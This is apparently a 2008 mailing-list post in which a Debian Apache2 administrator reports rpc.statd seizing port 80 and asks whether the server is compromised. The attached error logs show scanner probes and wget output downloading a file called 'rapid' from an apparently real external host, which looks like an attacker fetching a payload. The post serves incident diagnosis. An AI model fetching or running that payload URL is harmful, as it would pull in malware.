rpc.statd taking over port 80

Thu, 06 Mar 2008 04:59:07 GMT
Hi guys.
I am running apache2 on a Debian box which is vhosting 5 websites. I am 
having a bit of a problem with rpc.statd taking over port 80 on one of them.
This has happened 3 or 4 times now. I have had a look on Google but cannot 
seem to find any information on this problem.
It appears to me that it is some kind of attack on the server. I have 
attached the tail of the main apache2 error.log for the past 2 times this 
has happened. There seems to be a mkdir attempt, a wget of rapid (which I 
believe to be an ftp server) and then later on a sigterm. After this sigterm 
Apache2 shuts down and rpc.statd opens port 80 for listening.
Does anyone know of this attack or problem? It has me quite concerned about a 
server compromise.
Any help is appreciated.



[Fri Feb 22 02:10:38 2008] [error] [client 58.120.*.*] script '/var/www/go.php' not found or unable to stat
[Fri Feb 22 09:59:08 2008] [error] [client 58.120.*.*] script '/var/www/go.php' not found or unable to stat
[Fri Feb 22 21:23:09 2008] [error] [client 58.120.*.*] script '/var/www/go.php' not found or unable to stat
[Sat Feb 23 04:01:25 2008] [error] [client 217.169.*.*] File does not exist: /var/www/cloak
[Sat Feb 23 10:14:24 2008] [error] [client 204.246.*.*] File does not exist: /var/www/cloak
[Sat Feb 23 17:48:06 2008] [error] [client 79.18.*.*] File does not exist: /var/www/favicon.ico
mkdir: cannot create directory `"': File exists
mkdir: cannot create directory `"': File exists
--17:52:05--  http://static.213-239-221-73.clients.your-server.de/~ftp/rapid
           => `rapid'
Resolving static.213-239-221-73.clients.your-server.de... 213.239.221.73
Connecting to static.213-239-221-73.clients.your-server.de|213.239.221.73|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 743,798 (726K) [text/plain]

    0K .......... .......... .......... .......... ..........  6%   36.37 KB/s
   50K .......... .......... .......... .......... .......... 13%  144.73 KB/s
  100K .......... .......... .......... .......... .......... 20%  146.32 KB/s
  150K .......... .......... .......... .......... .......... 27%    7.53 MB/s
  200K .......... .......... .......... .......... .......... 34%    1.03 MB/s
  250K .......... .......... .......... .......... .......... 41%  169.14 KB/s
  300K .......... .......... .......... .......... .......... 48%   10.11 MB/s
  350K .......... .......... .......... .......... .......... 55%  150.28 KB/s
  400K .......... .......... .......... .......... .......... 61%    6.11 MB/s
  450K .......... .......... .......... .......... .......... 68%    3.86 MB/s
  500K .......... .......... .......... .......... .......... 75%    1.86 MB/s
  550K .......... .......... .......... .......... .......... 82%  163.67 KB/s
  600K .......... .......... .......... .......... .......... 89%    4.52 MB/s
  650K .......... .......... .......... .......... .......... 96%    4.99 MB/s
  700K .......... .......... ......                          100%    7.99 MB/s

17:52:09 (232.42 KB/s) - `rapid' saved [743798/743798]

[Sat Feb 23 23:04:48 2008] [error] [client 81.27.*.*] File does not exist: /var/www/sp_login.htm
[Sun Feb 24 06:51:05 2008] [notice] caught SIGTERM, shutting down

--------------------------------

[Fri Feb 29 03:14:53 2008] [error] [client 66.192.*.*] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:)
[Fri Feb 29 10:23:47 2008] [error] [client 58.120.*.*] script '/var/www/go.php' not found or unable to stat
[Fri Feb 29 18:22:59 2008] [error] [client 204.246.*.*] File does not exist: /var/www/cloak
[Sat Mar 01 03:17:07 2008] [error] [client 79.19.*.*] File does not exist: /var/www/favicon.ico
mkdir: cannot create directory `"': File exists
mkdir: cannot create directory `"': File exists
mkdir: cannot create directory `"': File exists
mkdir: cannot create directory `"': File exists
--03:17:14--  http://static.213-239-221-73.clients.your-server.de/~ftp/rapid
           => `rapid'
Resolving static.213-239-221-73.clients.your-server.de... 213.239.221.73
Connecting to static.213-239-221-73.clients.your-server.de|213.239.221.73|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 743,874 (726K) [text/plain]

    0K .......... .......... .......... .......... ..........  6%   35.66 KB/s
   50K .......... .......... .......... .......... .......... 13%  141.83 KB/s
  100K .......... .......... .......... .......... .......... 20%  143.71 KB/s
  150K .......... .......... .......... .......... .......... 27%    7.27 MB/s
  200K .......... .......... .......... .......... .......... 34%  144.84 KB/s
  250K .......... .......... .......... .......... .......... 41%    5.63 MB/s
  300K .......... .......... .......... .......... .......... 48%    1.28 MB/s
  350K .......... .......... .......... .......... .......... 55%  163.50 KB/s
  400K .......... .......... .......... .......... .......... 61%    5.63 MB/s
  450K .......... .......... .......... .......... .......... 68%    6.77 MB/s
  500K .......... .......... .......... .......... .......... 75%  149.82 KB/s
  550K .......... .......... .......... .......... .......... 82%    4.87 MB/s
  600K .......... .......... .......... .......... .......... 89%    7.11 MB/s
  650K .......... .......... .......... .......... .......... 96%  152.58 KB/s
  700K .......... .......... ......                          100%    3.78 MB/s

03:17:19 (207.08 KB/s) - `rapid' saved [743874/743874]

[Sat Mar 01 03:19:02 2008] [error] [client 193.109.*.*] request failed: error reading the headers
[Sat Mar 01 11:28:43 2008] [error] [client 217.169.*.*] File does not exist: /var/www/cloak
[Sun Mar 02 05:58:12 2008] [error] [client 193.109.*.*] request failed: error reading the headers
[Sun Mar 02 07:22:18 2008] [notice] caught SIGTERM, shutting down

